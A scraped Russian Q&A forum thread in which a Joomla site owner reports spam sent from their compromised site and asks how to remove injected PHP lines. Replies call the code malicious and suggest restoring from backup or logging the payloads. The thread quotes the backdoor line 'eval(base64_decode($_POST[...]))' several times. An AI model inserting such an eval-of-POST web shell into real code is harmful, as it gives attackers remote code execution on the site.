Как избавиться отbase64_decode код на странице?

Question

leopardo11 @leopardo11

PHP
Joomla

Как избавиться отbase64_decode код на странице?

Есть сайт на joomla, функция mail() была остановлена на хостинге из-за спам рассылки, порывшись на сайте, нашел такие коды <?php eval(base64_decode($_POST['n08c394']));?> в начале php файлов? но когда некоторые начинаю удалять, сайт перестает работать. Как правильно от них избавиться?
Сайт на Joomla, полностью удалить сайт не вариант, сайт рабочий

Вопрос задан более трёх лет назад
2471 просмотр

Комментировать

Подписаться 6 Оценить Комментировать

Помогут разобраться в теме Все курсы

Skillfactory

Профессия Fullstack веб-разработчик на JavaScript и PHP

20 месяцев

Далее
Хекслет

PHP-разработчик

10 месяцев

Далее
Нетология

Веб-разработчик с нуля: профессия с выбором специализации

14 месяцев

Далее

Решения вопроса 1

3 комментария

Пригласить эксперта

Ответы на вопрос 4

Комментировать

3 комментария

Комментировать

1 комментарий

Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы

PHP

+2 ещё

Простой
Как сконвертировать файл в формате excel в pdf?
- 3 подписчика
- 14 нояб.
- 306 просмотров
4

ответа
PHP

+1 ещё

Простой
Запрос на создание таблицы в clickhouse Yandex выдает ошибку 400 Bad Request, что не так с моим запросом?
- 1 подписчик
- 13 нояб.
- 217 просмотров
4

ответа
PHP

+2 ещё

Простой
Создание элемента с необычной формой и прозрачным фоном и рамкой?
- 1 подписчик
- 03 нояб.
- 185 просмотров
0

ответов
PHP

+3 ещё

Средний
Apache 2.4 и php 8.4 под windows. Почему не загружаются модули curl, openssl?
- 2 подписчика
- 01 нояб.
- 307 просмотров
3

ответа
PHP

Простой
Как объединить в один код 2 строчки $array[$key]?
- 2 подписчика
- 31 окт.
- 281 просмотр
2

ответа
PHP

+1 ещё

Простой
Как оптимально подтягивать og:img для списка статей с разных сайтов?
- 1 подписчик
- 27 окт.
- 149 просмотров
1

ответ
PHP

+2 ещё

Простой
Как реализовать зеркало сайт Тильда?
- 1 подписчик
- 22 окт.
- 321 просмотр
0

ответов
PHP

+1 ещё

Простой
Почему перестала работать ЮКасса?
- 1 подписчик
- 19 окт.
- 375 просмотров
1

ответ
PHP

Простой
Как вычислить результат математических операций в строке?
- 1 подписчик
- 17 окт.
- 303 просмотра
3

ответа
PHP

Простой
Можно ли в PHP вкладывать однострочные комментарии // в многострочные /* */?
- 1 подписчик
- 16 окт.
- 291 просмотр
4

ответа
Показать ещё Загружается…

PHP-разработчик

FoodSoul • Калининград

от 180 000 до 250 000 ₽

PHP- разработчик (Symfony)

IT-Spirit • Москва

от 230 000 до 320 000 ₽

Backend PHP developer

Office-Expert.kz

от 200 000 до 290 000 ₽

Answer 1 · 2014-06-20 19:42:37

Такой код расценивается как вредоносный, рекомендуется удалить его полностью
от самого начала и до конца и проверить файлы на вставку этого кода
<?php eval(base64_decode($_POST['n08c394']));?>

Answer 2 · 2014-06-20 19:32:47

Scorpi @Scorpi

Что значит перестаёт работать? Ошибка какая то?

Ответ написан более трёх лет назад

Комментировать

Answer 3 · 2014-06-20 19:34:45

leopardo11 @leopardo11 Автор вопроса

да, скриптом переименовал eval(base64_decode($_POST['n08c394'])); на eval(blabla($_POST['n08c394']));

Ответ написан более трёх лет назад

3 комментария

Answer 4 · 2014-06-20 20:34:54

Пума Тайланд @opium

Просто люблю качественно работать

восстановите сайт из бекапа просто

Ответ написан более трёх лет назад

Комментировать

Answer 5 · 2014-06-20 21:15:27

Лучше бы сохранили в лог "base64_decode($_POST['n08c394'])" с сопутствующей инфой и посмотрели, что там такое запускается и откуда лезет.
Понимание, самый верный способ решить проблему. Я так понимаю, что удаление этой дряни не закроет ту дыру, через которую она образовалась.

Как избавиться отbase64_decode код на странице?

Войдите, чтобы написать ответ

Минуточку внимания

Войдите на сайт